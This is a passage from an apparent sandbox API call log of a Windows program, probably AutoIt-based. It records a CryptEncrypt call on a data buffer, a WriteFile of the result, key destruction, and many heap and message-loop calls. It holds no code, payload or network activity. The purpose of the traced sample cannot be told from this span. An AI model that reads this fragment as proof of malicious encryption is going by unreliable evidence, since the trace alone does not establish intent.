lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.550] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x441ec48*, pdwDataLen=0x144e790*=0x6823, dwBufLen=0x6830 | out: pbData=0x441ec48*, pdwDataLen=0x144e790*=0x6830) returned 1 [0075.551] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.551] WriteFile (in: hFile=0x258, lpBuffer=0x4411bf0*, nNumberOfBytesToWrite=0x6830, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4411bf0*, lpNumberOfBytesWritten=0x144f194*=0x6830, lpOverlapped=0x0) returned 1 [0075.553] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca550, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0075.553] CryptDestroyKey (hKey=0x41ac640) returned 1 [0075.554] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.554] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.554] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.557] TranslateMessage (lpMsg=0x144ed64) returned 0 [0075.557] DispatchMessageW (lpMsg=0x144ed64) returned 0x0 [0075.557] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0075.557] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0075.557] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0075.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0075.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0075.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0075.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0075.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0075.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0075.557] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0075.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.559] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.559] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.559] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0075.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.559] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0075.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0075.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.560] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.560] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0075.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0075.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0075.561] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0075.561] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0075.561] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0075.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0075.562] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0075.562] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0075.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0075.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0075.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 